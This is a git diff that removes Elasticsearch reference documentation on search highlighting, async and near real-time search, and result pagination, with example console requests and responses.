It also requires less -disk space than using `term_vectors`. - -* Term vectors. If `term_vector` information is provided by setting -`term_vector` to `with_positions_offsets` in the mapping, the `unified` -highlighter automatically uses the `term_vector` to highlight the field. -It's fast especially for large fields (> `1MB`) and for highlighting multi-term queries like -`prefix` or `wildcard` because it can access the dictionary of terms for each document. -The `fvh` highlighter always uses term vectors. - -* Plain highlighting. This mode is used by the `unified` when there is no other alternative. -It creates a tiny in-memory index and re-runs the original query criteria through -Lucene's query execution planner to get access to low-level match information on -the current document. This is repeated for every field and every document that -needs highlighting. The `plain` highlighter always uses plain highlighting. - -[WARNING] -Plain highlighting for large texts may require substantial amount of time and memory. -To protect against this, the maximum number of text characters that will be analyzed has been -limited to 1000000. This default limit can be changed -for a particular index with the index setting `index.highlight.max_analyzed_offset`. - -[discrete] -[[highlighting-settings]] -=== Highlighting settings - -Highlighting settings can be set on a global level and overridden at -the field level. - -boundary_chars:: A string that contains each boundary character. -Defaults to `.,!? \t\n`. - -boundary_max_scan:: How far to scan for boundary characters. Defaults to `20`. - -[[boundary-scanners]] -boundary_scanner:: Specifies how to break the highlighted fragments: `chars`, -`sentence`, or `word`. Only valid for the `unified` and `fvh` highlighters. -Defaults to `sentence` for the `unified` highlighter. Defaults to `chars` for -the `fvh` highlighter. -`chars`::: Use the characters specified by `boundary_chars` as highlighting -boundaries. The `boundary_max_scan` setting controls how far to scan for -boundary characters. Only valid for the `fvh` highlighter. -`sentence`::: Break highlighted fragments at the next sentence boundary, as -determined by Java's -https://docs.oracle.com/javase/8/docs/api/java/text/BreakIterator.html[BreakIterator]. -You can specify the locale to use with `boundary_scanner_locale`. -+ -NOTE: When used with the `unified` highlighter, the `sentence` scanner splits -sentences bigger than `fragment_size` at the first word boundary next to -`fragment_size`. You can set `fragment_size` to 0 to never split any sentence. - -`word`::: Break highlighted fragments at the next word boundary, as determined -by Java's https://docs.oracle.com/javase/8/docs/api/java/text/BreakIterator.html[BreakIterator]. -You can specify the locale to use with `boundary_scanner_locale`. - -boundary_scanner_locale:: Controls which locale is used to search for sentence -and word boundaries. This parameter takes a form of a language tag, -e.g. `"en-US"`, `"fr-FR"`, `"ja-JP"`. More info can be found in the -https://docs.oracle.com/javase/8/docs/api/java/util/Locale.html#forLanguageTag-java.lang.String-[Locale Language Tag] -documentation. The default value is https://docs.oracle.com/javase/8/docs/api/java/util/Locale.html#ROOT[ Locale.ROOT]. - -encoder:: Indicates if the snippet should be HTML encoded: -`default` (no encoding) or `html` (HTML-escape the snippet text and then -insert the highlighting tags) - -fields:: Specifies the fields to retrieve highlights for. 
You can use wildcards -to specify fields. For example, you could specify `comment_*` to -get highlights for all <> and <> fields -that start with `comment_`. -+ -NOTE: Only text and keyword fields are highlighted when you use wildcards. -If you use a custom mapper and want to highlight on a field anyway, you -must explicitly specify that field name. - -force_source:: Highlight based on the source even if the field is -stored separately. Defaults to `false`. - -fragmenter:: Specifies how text should be broken up in highlight -snippets: `simple` or `span`. Only valid for the `plain` highlighter. -Defaults to `span`. - -`simple`::: Breaks up text into same-sized fragments. -`span`::: Breaks up text into same-sized fragments, but tries to avoid -breaking up text between highlighted terms. This is helpful when you're -querying for phrases. Default. - -fragment_offset:: Controls the margin from which you want to start -highlighting. Only valid when using the `fvh` highlighter. - -fragment_size:: The size of the highlighted fragment in characters. Defaults -to 100. - -highlight_query:: Highlight matches for a query other than the search -query. This is especially useful if you use a rescore query because -those are not taken into account by highlighting by default. -+ -IMPORTANT: {es} does not validate that `highlight_query` contains -the search query in any way so it is possible to define it so -legitimate query results are not highlighted. Generally, you should -include the search query as part of the `highlight_query`. - -matched_fields:: Combine matches on multiple fields to highlight a single field. -This is most intuitive for multifields that analyze the same string in different -ways. All `matched_fields` must have `term_vector` set to -`with_positions_offsets`, but only the field to which -the matches are combined is loaded so only that field benefits from having -`store` set to `yes`. Only valid for the `fvh` highlighter. - -no_match_size:: The amount of text you want to return from the beginning -of the field if there are no matching fragments to highlight. Defaults -to 0 (nothing is returned). - -number_of_fragments:: The maximum number of fragments to return. If the -number of fragments is set to 0, no fragments are returned. Instead, -the entire field contents are highlighted and returned. This can be -handy when you need to highlight short texts such as a title or -address, but fragmentation is not required. If `number_of_fragments` -is 0, `fragment_size` is ignored. Defaults to 5. - -order:: Sorts highlighted fragments by score when set to `score`. By default, -fragments will be output in the order they appear in the field (order: `none`). -Setting this option to `score` will output the most relevant fragments first. -Each highlighter applies its own logic to compute relevancy scores. See -the document <> -for more details how different highlighters find the best fragments. - -phrase_limit:: Controls the number of matching phrases in a document that are -considered. Prevents the `fvh` highlighter from analyzing too many phrases -and consuming too much memory. When using `matched_fields`, `phrase_limit` -phrases per matched field are considered. Raising the limit increases query -time and consumes more memory. Only supported by the `fvh` highlighter. -Defaults to 256. - -pre_tags:: Use in conjunction with `post_tags` to define the HTML tags -to use for the highlighted text. By default, highlighted text is wrapped -in `` and `` tags. Specify as an array of strings. 
- -post_tags:: Use in conjunction with `pre_tags` to define the HTML tags -to use for the highlighted text. By default, highlighted text is wrapped -in `` and `` tags. Specify as an array of strings. - -require_field_match:: By default, only fields that contains a query match are -highlighted. Set `require_field_match` to `false` to highlight all fields. -Defaults to `true`. - -tags_schema:: Set to `styled` to use the built-in tag schema. The `styled` -schema defines the following `pre_tags` and defines `post_tags` as -``. -+ -[source,html] --------------------------------------------------- -, , , -, , , -, , , - --------------------------------------------------- - -[[highlighter-type]] -type:: The highlighter to use: `unified`, `plain`, or `fvh`. Defaults to -`unified`. - -[discrete] -[[highlighting-examples]] -=== Highlighting examples - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -[[override-global-settings]] -[discrete] -== Override global settings - -You can specify highlighter settings globally and selectively override them for -individual fields. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query" : { - "match": { "user.id": "kimchy" } - }, - "highlight" : { - "number_of_fragments" : 3, - "fragment_size" : 150, - "fields" : { - "body" : { "pre_tags" : [""], "post_tags" : [""] }, - "blog.title" : { "number_of_fragments" : 0 }, - "blog.author" : { "number_of_fragments" : 0 }, - "blog.comment" : { "number_of_fragments" : 5, "order" : "score" } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -[discrete] -[[specify-highlight-query]] -== Specify a highlight query - -You can specify a `highlight_query` to take additional information into account -when highlighting. For example, the following query includes both the search -query and rescore query in the `highlight_query`. Without the `highlight_query`, -highlighting would only take the search query into account. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match": { - "comment": { - "query": "foo bar" - } - } - }, - "rescore": { - "window_size": 50, - "query": { - "rescore_query": { - "match_phrase": { - "comment": { - "query": "foo bar", - "slop": 1 - } - } - }, - "rescore_query_weight": 10 - } - }, - "_source": false, - "highlight": { - "order": "score", - "fields": { - "comment": { - "fragment_size": 150, - "number_of_fragments": 3, - "highlight_query": { - "bool": { - "must": { - "match": { - "comment": { - "query": "foo bar" - } - } - }, - "should": { - "match_phrase": { - "comment": { - "query": "foo bar", - "slop": 1, - "boost": 10.0 - } - } - }, - "minimum_should_match": 0 - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -[discrete] -[[set-highlighter-type]] -== Set highlighter type - -The `type` field allows to force a specific highlighter type. -The allowed values are: `unified`, `plain` and `fvh`. -The following is an example that forces the use of the plain highlighter: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match": { "user.id": "kimchy" } - }, - "highlight": { - "fields": { - "comment": { "type": "plain" } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -[[configure-tags]] -[discrete] -== Configure highlighting tags - -By default, the highlighting will wrap highlighted text in `` and -``. 
This can be controlled by setting `pre_tags` and `post_tags`, -for example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query" : { - "match": { "user.id": "kimchy" } - }, - "highlight" : { - "pre_tags" : [""], - "post_tags" : [""], - "fields" : { - "body" : {} - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -When using the fast vector highlighter, you can specify additional tags and the -"importance" is ordered. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query" : { - "match": { "user.id": "kimchy" } - }, - "highlight" : { - "pre_tags" : ["", ""], - "post_tags" : ["", ""], - "fields" : { - "body" : {} - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -You can also use the built-in `styled` tag schema: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query" : { - "match": { "user.id": "kimchy" } - }, - "highlight" : { - "tags_schema" : "styled", - "fields" : { - "comment" : {} - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -[discrete] -[[highlight-source]] -== Highlight on source - -Forces the highlighting to highlight fields based on the source even if fields -are stored separately. Defaults to `false`. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query" : { - "match": { "user.id": "kimchy" } - }, - "highlight" : { - "fields" : { - "comment" : {"force_source" : true} - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - - -[[highlight-all]] -[discrete] -== Highlight in all fields - -By default, only fields that contains a query match are highlighted. Set -`require_field_match` to `false` to highlight all fields. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query" : { - "match": { "user.id": "kimchy" } - }, - "highlight" : { - "require_field_match": false, - "fields": { - "body" : { "pre_tags" : [""], "post_tags" : [""] } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -[[matched-fields]] -[discrete] -== Combine matches on multiple fields - -WARNING: This is only supported by the `fvh` highlighter - -The Fast Vector Highlighter can combine matches on multiple fields to -highlight a single field. This is most intuitive for multifields that -analyze the same string in different ways. All `matched_fields` must have -`term_vector` set to `with_positions_offsets` but only the field to which -the matches are combined is loaded so only that field would benefit from having -`store` set to `yes`. - -In the following examples, `comment` is analyzed by the `english` -analyzer and `comment.plain` is analyzed by the `standard` analyzer. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string": { - "query": "comment.plain:running scissors", - "fields": [ "comment" ] - } - }, - "highlight": { - "order": "score", - "fields": { - "comment": { - "matched_fields": [ "comment", "comment.plain" ], - "type": "fvh" - } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -The above matches both "run with scissors" and "running with scissors" -and would highlight "running" and "scissors" but not "run". 
If both -phrases appear in a large document then "running with scissors" is -sorted above "run with scissors" in the fragments list because there -are more matches in that fragment. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string": { - "query": "running scissors", - "fields": ["comment", "comment.plain^10"] - } - }, - "highlight": { - "order": "score", - "fields": { - "comment": { - "matched_fields": ["comment", "comment.plain"], - "type" : "fvh" - } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -The above highlights "run" as well as "running" and "scissors" but -still sorts "running with scissors" above "run with scissors" because -the plain match ("running") is boosted. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "query_string": { - "query": "running scissors", - "fields": [ "comment", "comment.plain^10" ] - } - }, - "highlight": { - "order": "score", - "fields": { - "comment": { - "matched_fields": [ "comment.plain" ], - "type": "fvh" - } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -The above query wouldn't highlight "run" or "scissor" but shows that -it is just fine not to list the field to which the matches are combined -(`comment`) in the matched fields. - -[NOTE] -Technically it is also fine to add fields to `matched_fields` that -don't share the same underlying string as the field to which the matches -are combined. The results might not make much sense and if one of the -matches is off the end of the text then the whole query will fail. - -[NOTE] -=================================================================== -There is a small amount of overhead involved with setting -`matched_fields` to a non-empty array so always prefer -[source,js] --------------------------------------------------- - "highlight": { - "fields": { - "comment": {} - } - } --------------------------------------------------- -// NOTCONSOLE -to -[source,js] --------------------------------------------------- - "highlight": { - "fields": { - "comment": { - "matched_fields": ["comment"], - "type" : "fvh" - } - } - } --------------------------------------------------- -// NOTCONSOLE -=================================================================== - - -[[explicit-field-order]] -[discrete] -== Explicitly order highlighted fields -Elasticsearch highlights the fields in the order that they are sent, but per the -JSON spec, objects are unordered. If you need to be explicit about the order -in which fields are highlighted specify the `fields` as an array: - -[source,console] --------------------------------------------------- -GET /_search -{ - "highlight": { - "fields": [ - { "title": {} }, - { "text": {} } - ] - } -} --------------------------------------------------- -// TEST[setup:my_index] - -None of the highlighters built into Elasticsearch care about the order that the -fields are highlighted but a plugin might. - - - - -[discrete] -[[control-highlighted-frags]] -== Control highlighted fragments - -Each field highlighted can control the size of the highlighted fragment -in characters (defaults to `100`), and the maximum number of fragments -to return (defaults to `5`). 
-
-For example:
-
-[source,console]
--------------------------------------------------
-GET /_search
-{
-  "query" : {
-    "match": { "user.id": "kimchy" }
-  },
-  "highlight" : {
-    "fields" : {
-      "comment" : {"fragment_size" : 150, "number_of_fragments" : 3}
-    }
-  }
-}
--------------------------------------------------
-// TEST[setup:my_index]
-
-On top of this, it is possible to specify that highlighted fragments need
-to be sorted by score:
-
-[source,console]
--------------------------------------------------
-GET /_search
-{
-  "query" : {
-    "match": { "user.id": "kimchy" }
-  },
-  "highlight" : {
-    "order" : "score",
-    "fields" : {
-      "comment" : {"fragment_size" : 150, "number_of_fragments" : 3}
-    }
-  }
-}
--------------------------------------------------
-// TEST[setup:my_index]
-
-If the `number_of_fragments` value is set to `0`, no fragments are
-produced. Instead, the whole content of the field is returned and
-highlighted. This can be very handy if short texts (like a document
-title or address) need to be highlighted but no fragmentation is
-required. Note that `fragment_size` is ignored in this case.
-
-[source,console]
--------------------------------------------------
-GET /_search
-{
-  "query" : {
-    "match": { "user.id": "kimchy" }
-  },
-  "highlight" : {
-    "fields" : {
-      "body" : {},
-      "blog.title" : {"number_of_fragments" : 0}
-    }
-  }
-}
--------------------------------------------------
-// TEST[setup:my_index]
-
-When using the `fvh` highlighter, you can use the `fragment_offset`
-parameter to control the margin from which to start highlighting.
-
-If there is no matching fragment to highlight, nothing is returned by
-default. Instead, you can return a snippet of text from the beginning of
-the field by setting `no_match_size` (default `0`) to the length of the
-text that you want returned. The actual length may be shorter or longer
-than specified because it tries to break on a word boundary.
- -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match": { "user.id": "kimchy" } - }, - "highlight": { - "fields": { - "comment": { - "fragment_size": 150, - "number_of_fragments": 3, - "no_match_size": 150 - } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -[discrete] -[[highlight-postings-list]] -== Highlight using the postings list - -Here is an example of setting the `comment` field in the index mapping to -allow for highlighting using the postings: - -[source,console] --------------------------------------------------- -PUT /example -{ - "mappings": { - "properties": { - "comment" : { - "type": "text", - "index_options" : "offsets" - } - } - } -} --------------------------------------------------- - -Here is an example of setting the `comment` field to allow for -highlighting using the `term_vectors` (this will cause the index to be bigger): - -[source,console] --------------------------------------------------- -PUT /example -{ - "mappings": { - "properties": { - "comment" : { - "type": "text", - "term_vector" : "with_positions_offsets" - } - } - } -} --------------------------------------------------- - -[discrete] -[[specify-fragmenter]] -== Specify a fragmenter for the plain highlighter - -When using the `plain` highlighter, you can choose between the `simple` and -`span` fragmenters: - -[source,console] --------------------------------------------------- -GET my-index-000001/_search -{ - "query": { - "match_phrase": { "message": "number 1" } - }, - "highlight": { - "fields": { - "message": { - "type": "plain", - "fragment_size": 15, - "number_of_fragments": 3, - "fragmenter": "simple" - } - } - } -} --------------------------------------------------- -// TEST[setup:messages] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 1.6011951, - "hits": [ - { - "_index": "my-index-000001", - "_type": "_doc", - "_id": "1", - "_score": 1.6011951, - "_source": { - "message": "some message with the number 1" - }, - "highlight": { - "message": [ - " with the number", - " 1" - ] - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,/] - -[source,console] --------------------------------------------------- -GET my-index-000001/_search -{ - "query": { - "match_phrase": { "message": "number 1" } - }, - "highlight": { - "fields": { - "message": { - "type": "plain", - "fragment_size": 15, - "number_of_fragments": 3, - "fragmenter": "span" - } - } - } -} --------------------------------------------------- -// TEST[setup:messages] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 1.6011951, - "hits": [ - { - "_index": "my-index-000001", - "_type": "_doc", - "_id": "1", - "_score": 1.6011951, - "_source": { - "message": "some message with the number 1" - }, - "highlight": { - "message": [ - " with the number 1" - ] - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,/] - -If the `number_of_fragments` option is set to `0`, -`NullFragmenter` is used which does not fragment the text at all. 
-This is useful for highlighting the entire contents of a document or field.
-
-
-[discrete]
-[[how-es-highlighters-work-internally]]
-== How highlighters work internally
-
-Given a query and a text (the content of a document field), the goal of a
-highlighter is to find the best text fragments for the query, and highlight
-the query terms in the found fragments. For this, a highlighter needs to
-address several questions:
-
-- How to break a text into fragments?
-- How to find the best fragments among all fragments?
-- How to highlight the query terms in a fragment?
-
-[discrete]
-=== How to break a text into fragments?
-Relevant settings: `fragment_size`, `fragmenter`, `type` of highlighter,
-`boundary_chars`, `boundary_max_scan`, `boundary_scanner`, `boundary_scanner_locale`.
-
-The plain highlighter begins by analyzing the text using the given analyzer and
-creating a token stream from it. It uses a very simple algorithm to break the
-token stream into fragments: it loops through the terms in the token stream, and
-every time the current term's `end_offset` exceeds `fragment_size` multiplied by
-the number of fragments created so far, a new fragment is created. A little more
-computation is done when using the `span` fragmenter to avoid breaking up text
-between highlighted terms. But overall, since the breaking is done only by
-`fragment_size`, some fragments can be quite odd, e.g. beginning
-with a punctuation mark.
-
-The unified and FVH highlighters do a better job of breaking up a text into
-fragments by utilizing Java's `BreakIterator`. This ensures that a fragment
-is a valid sentence as long as `fragment_size` allows for it.
-
-[discrete]
-=== How to find the best fragments?
-Relevant settings: `number_of_fragments`.
-
-To find the best, most relevant fragments, a highlighter needs to score
-each fragment with respect to the given query. The goal is to score only those
-terms that participated in generating the 'hit' on the document.
-For some complex queries, this is still a work in progress.
-
-The plain highlighter creates an in-memory index from the current token stream
-and re-runs the original query criteria through Lucene's query execution planner
-to get access to low-level match information for the current text.
-For more complex queries the original query may be converted to a span query,
-as span queries can handle phrases more accurately. The obtained low-level match
-information is then used to score each individual fragment. The scoring method of
-the plain highlighter is quite simple: each fragment is scored by the number of
-unique query terms found in that fragment. The score of an individual term is
-equal to its boost, which is `1` by default. Thus, by default, a fragment that
-contains one unique query term gets a score of 1, a fragment that contains two
-unique query terms gets a score of 2, and so on. The fragments are then sorted by
-their scores, so the highest scoring fragments are output first.
-
-The FVH doesn't need to analyze the text and build an in-memory index, as it uses
-pre-indexed document term vectors and finds among them the terms that correspond
-to the query. The FVH scores each fragment by the number of query terms found in
-that fragment. Similarly to the plain highlighter, the score of an individual term
-is equal to its boost value. In contrast to the plain highlighter, all query terms
-are counted, not only unique terms.
-
-The unified highlighter can use pre-indexed term vectors or pre-indexed term
-offsets, if they are available. 
Otherwise, similar to Plain Highlighter, it has to create -an in-memory index from the text. Unified highlighter uses the BM25 scoring model -to score fragments. - -[discrete] -=== How to highlight the query terms in a fragment? -Relevant settings: `pre-tags`, `post-tags`. - -The goal is to highlight only those terms that participated in generating the 'hit' on the document. -For some complex boolean queries, this is still work in progress, as highlighters don't reflect -the boolean logic of a query and only extract leaf (terms, phrases, prefix etc) queries. - -Plain highlighter given the token stream and the original text, recomposes the original text to -highlight only terms from the token stream that are contained in the low-level match information -structure from the previous step. - -FVH and unified highlighter use intermediate data structures to represent -fragments in some raw form, and then populate them with actual text. - -A highlighter uses `pre-tags`, `post-tags` to encode highlighted terms. - -[discrete] -=== An example of the work of the unified highlighter - -Let's look in more details how unified highlighter works. - -First, we create a index with a text field `content`, that will be indexed -using `english` analyzer, and will be indexed without offsets or term vectors. - -[source,js] --------------------------------------------------- -PUT test_index -{ - "mappings": { - "properties": { - "content": { - "type": "text", - "analyzer": "english" - } - } - } -} --------------------------------------------------- -// NOTCONSOLE - -We put the following document into the index: - -[source,js] --------------------------------------------------- -PUT test_index/_doc/doc1 -{ - "content" : "For you I'm only a fox like a hundred thousand other foxes. But if you tame me, we'll need each other. You'll be the only boy in the world for me. I'll be the only fox in the world for you." -} --------------------------------------------------- -// NOTCONSOLE - - -And we ran the following query with a highlight request: - -[source,js] --------------------------------------------------- -GET test_index/_search -{ - "query": { - "match_phrase" : {"content" : "only fox"} - }, - "highlight": { - "type" : "unified", - "number_of_fragments" : 3, - "fields": { - "content": {} - } - } -} --------------------------------------------------- -// NOTCONSOLE - - -After `doc1` is found as a hit for this query, this hit will be passed to the -unified highlighter for highlighting the field `content` of the document. -Since the field `content` was not indexed either with offsets or term vectors, -its raw field value will be analyzed, and in-memory index will be built from -the terms that match the query: - - {"token":"onli","start_offset":12,"end_offset":16,"position":3}, - {"token":"fox","start_offset":19,"end_offset":22,"position":5}, - {"token":"fox","start_offset":53,"end_offset":58,"position":11}, - {"token":"onli","start_offset":117,"end_offset":121,"position":24}, - {"token":"onli","start_offset":159,"end_offset":163,"position":34}, - {"token":"fox","start_offset":164,"end_offset":167,"position":35} - -Our complex phrase query will be converted to the span query: -`spanNear([text:onli, text:fox], 0, true)`, meaning that we are looking for -terms "onli: and "fox" within 0 distance from each other, and in the given -order. 
The span query will be run against the previously created in-memory index
-to find the following match:
-
-    {"term":"onli", "start_offset":159, "end_offset":163},
-    {"term":"fox", "start_offset":164, "end_offset":167}
-
-In our example, we got a single match, but there could be several matches.
-Given the matches, the unified highlighter breaks the text of the field into
-so-called "passages". Each passage must contain at least one match.
-Using Java's `BreakIterator`, the unified highlighter ensures that each
-passage represents a full sentence as long as it doesn't exceed `fragment_size`.
-For our example, we got a single passage with the following properties
-(only a subset of the properties is shown here):
-
-    Passage:
-        startOffset: 147
-        endOffset: 189
-        score: 3.7158387
-        matchStarts: [159, 164]
-        matchEnds: [163, 167]
-        numMatches: 2
-
-Notice that a passage has a score, calculated using the BM25 scoring formula
-adapted for passages. Scores allow us to choose the best scoring passages when
-more passages are available than the `number_of_fragments` requested by the
-user. Scores also let us sort passages by `order: "score"` if requested.
-
-As the final step, the unified highlighter extracts from the field's text
-a string corresponding to each passage:
-
-    "I'll be the only fox in the world for you."
-
-and formats all matches in this string with the `<em>` and `</em>` tags, using
-the passage's `matchStarts` and `matchEnds` information:
-
-    I'll be the only <em>fox</em> in the world for you.
-
-These formatted strings are the final result of the highlighter, returned
-to the user.
\ No newline at end of file
diff --git a/docs/reference/search/search-your-data/long-running-searches.asciidoc b/docs/reference/search/search-your-data/long-running-searches.asciidoc
deleted file mode 100644
index d51e017b0f9..00000000000
--- a/docs/reference/search/search-your-data/long-running-searches.asciidoc
+++ /dev/null
@@ -1,22 +0,0 @@
-[role="xpack"]
-[testenv="basic"]
-[[async-search-intro]]
-== Long-running searches
-
-{es} generally allows you to quickly search across large amounts of data. There
-are situations where a search executes on many shards, possibly against
-<> and spanning multiple
-<>, for which
-results are not expected to be returned in milliseconds. When you need to
-execute a long-running search, synchronously
-waiting for its results to be returned is not ideal. Instead, async search lets
-you submit a search request that gets executed _asynchronously_,
-monitor the progress of the request, and retrieve results at a later stage.
-You can also retrieve partial results as they become available, but
-before the search has completed.
-
-You can submit an async search request using the <> API. The <> API allows you to
-monitor the progress of an async search request and retrieve its results. An
-ongoing async search can be deleted through the <> API.
diff --git a/docs/reference/search/search-your-data/near-real-time.asciidoc b/docs/reference/search/search-your-data/near-real-time.asciidoc
deleted file mode 100644
index fe24a593cff..00000000000
--- a/docs/reference/search/search-your-data/near-real-time.asciidoc
+++ /dev/null
@@ -1,25 +0,0 @@
-[[near-real-time]]
-== Near real-time search
-The overview of <> indicates that when a document is stored in {es}, it is indexed and fully searchable in _near real-time_--within 1 second. What defines near real-time search? 
- -Lucene, the Java libraries on which {es} is based, introduced the concept of per-segment search. A _segment_ is similar to an inverted index, but the word _index_ in Lucene means "a collection of segments plus a commit point". After a commit, a new segment is added to the commit point and the buffer is cleared. - -Sitting between {es} and the disk is the filesystem cache. Documents in the in-memory indexing buffer (<>) are written to a new segment (<>). The new segment is written to the filesystem cache first (which is cheap) and only later is it flushed to disk (which is expensive). However, after a file is in the cache, it can be opened and read just like any other file. - -[[img-pre-refresh]] -.A Lucene index with new documents in the in-memory buffer -image::images/lucene-in-memory-buffer.png["A Lucene index with new documents in the in-memory buffer"] - -Lucene allows new segments to be written and opened, making the documents they contain visible to search ​without performing a full commit. This is a much lighter process than a commit to disk, and can be done frequently without degrading performance. - -[[img-post-refresh]] -.The buffer contents are written to a segment, which is searchable, but is not yet committed -image::images/lucene-written-not-committed.png["The buffer contents are written to a segment, which is searchable, but is not yet committed"] - -In {es}, this process of writing and opening a new segment is called a _refresh_. A refresh makes all operations performed on an index since the last refresh available for search. You can control refreshes through the following means: - -* Waiting for the refresh interval -* Setting the <> option -* Using the <> to explicitly complete a refresh (`POST _refresh`) - -By default, {es} periodically refreshes indices every second, but only on indices that have received one search request or more in the last 30 seconds. This is why we say that {es} has _near_ real-time search: document changes are not visible to search immediately, but will become visible within this timeframe. diff --git a/docs/reference/search/search-your-data/paginate-search-results.asciidoc b/docs/reference/search/search-your-data/paginate-search-results.asciidoc deleted file mode 100644 index f036d04fb00..00000000000 --- a/docs/reference/search/search-your-data/paginate-search-results.asciidoc +++ /dev/null @@ -1,483 +0,0 @@ -[[paginate-search-results]] -== Paginate search results - -By default, searches return the top 10 matching hits. To page through a larger -set of results, you can use the <>'s `from` and `size` -parameters. The `from` parameter defines the number of hits to skip, defaulting -to `0`. The `size` parameter is the maximum number of hits to return. Together, -these two parameters define a page of results. - -[source,console] ----- -GET /_search -{ - "from": 5, - "size": 20, - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- - -Avoid using `from` and `size` to page too deeply or request too many results at -once. Search requests usually span multiple shards. Each shard must load its -requested hits and the hits for any previous pages into memory. For deep pages -or large sets of results, these operations can significantly increase memory and -CPU usage, resulting in degraded performance or node failures. - -By default, you cannot use `from` and `size` to page through more than 10,000 -hits. This limit is a safeguard set by the -<> index setting. If you need -to page through more than 10,000 hits, use the <> -parameter instead. 
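-
-As a concrete illustration (an untested sketch, reusing the `user.id` example
-from above), a request whose `from` plus `size` exceeds the default window of
-`10000` is rejected, which is the point at which `search_after` becomes necessary:
-
-[source,js]
------
-GET /_search
-{
-  "from": 9995,
-  "size": 10, <1>
-  "query": {
-    "match": {
-      "user.id": "kimchy"
-    }
-  }
-}
------
-// NOTCONSOLE
-
-<1> `from + size` is `10005`, which exceeds the default
-`index.max_result_window` of `10000`, so {es} returns an error instead of hits.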
- -WARNING: {es} uses Lucene's internal doc IDs as tie-breakers. These internal doc -IDs can be completely different across replicas of the same data. When paging -search hits, you might occasionally see that documents with the same sort values -are not ordered consistently. - -[discrete] -[[search-after]] -=== Search after - -You can use the `search_after` parameter to retrieve the next page of hits -using a set of <> from the previous page. - -Using `search_after` requires multiple search requests with the same `query` and -`sort` values. If a <> occurs between these requests, -the order of your results may change, causing inconsistent results across pages. To -prevent this, you can create a <> to -preserve the current index state over your searches. - -[source,console] ----- -POST /my-index-000001/_pit?keep_alive=1m ----- -// TEST[setup:my_index] - -The API returns a PIT ID. - -[source,console-result] ----- -{ - "id": "46ToAwMDaWR4BXV1aWQxAgZub2RlXzEAAAAAAAAAAAEBYQNpZHkFdXVpZDIrBm5vZGVfMwAAAAAAAAAAKgFjA2lkeQV1dWlkMioGbm9kZV8yAAAAAAAAAAAMAWICBXV1aWQyAAAFdXVpZDEAAQltYXRjaF9hbGw_gAAAAA==" -} ----- -// TESTRESPONSE[s/"id": "46ToAwMDaWR4BXV1aWQxAgZub2RlXzEAAAAAAAAAAAEBYQNpZHkFdXVpZDIrBm5vZGVfMwAAAAAAAAAAKgFjA2lkeQV1dWlkMioGbm9kZV8yAAAAAAAAAAAMAWICBXV1aWQyAAAFdXVpZDEAAQltYXRjaF9hbGw_gAAAAA=="/"id": $body.id/] - -To get the first page of results, submit a search request with a `sort` -argument. If using a PIT, specify the PIT ID in the `pit.id` parameter and omit -the target data stream or index from the request path. - -IMPORTANT: We recommend you include a tiebreaker field in your `sort`. This -tiebreaker field should contain a unique value for each document. If you don't -include a tiebreaker field, your paged results could miss or duplicate hits. - -[source,console] ----- -GET /_search -{ - "size": 10000, - "query": { - "match" : { - "user.id" : "elkbee" - } - }, - "pit": { - "id": "46ToAwMDaWR4BXV1aWQxAgZub2RlXzEAAAAAAAAAAAEBYQNpZHkFdXVpZDIrBm5vZGVfMwAAAAAAAAAAKgFjA2lkeQV1dWlkMioGbm9kZV8yAAAAAAAAAAAMAWICBXV1aWQyAAAFdXVpZDEAAQltYXRjaF9hbGw_gAAAAA==", <1> - "keep_alive": "1m" - }, - "sort": [ <2> - {"@timestamp": "asc"}, - {"tie_breaker_id": "asc"} - ] -} ----- -// TEST[catch:missing] - -<1> PIT ID for the search. -<2> Sorts hits for the search. - -The search response includes an array of `sort` values for each hit. If you used -a PIT, the response's `pit_id` parameter contains an updated PIT ID. - -[source,console-result] ----- -{ - "pit_id" : "46ToAwEPbXktaW5kZXgtMDAwMDAxFnVzaTVuenpUVGQ2TFNheUxVUG5LVVEAFldicVdzOFFtVHZTZDFoWWowTGkwS0EAAAAAAAAAAAQURzZzcUszUUJ5U1NMX3Jyak5ET0wBFnVzaTVuenpUVGQ2TFNheUxVUG5LVVEAAA==", <1> - "took" : 17, - "timed_out" : false, - "_shards" : ..., - "hits" : { - "total" : ..., - "max_score" : null, - "hits" : [ - ... - { - "_index" : "my-index-000001", - "_id" : "FaslK3QBySSL_rrj9zM5", - "_score" : null, - "_source" : ..., - "sort" : [ <2> - 4098435132000, - "FaslK3QBySSL_rrj9zM5" - ] - } - ] - } -} ----- -// TESTRESPONSE[skip: unable to access PIT ID] - -<1> Updated `id` for the point in time. -<2> Sort values for the last returned hit. - 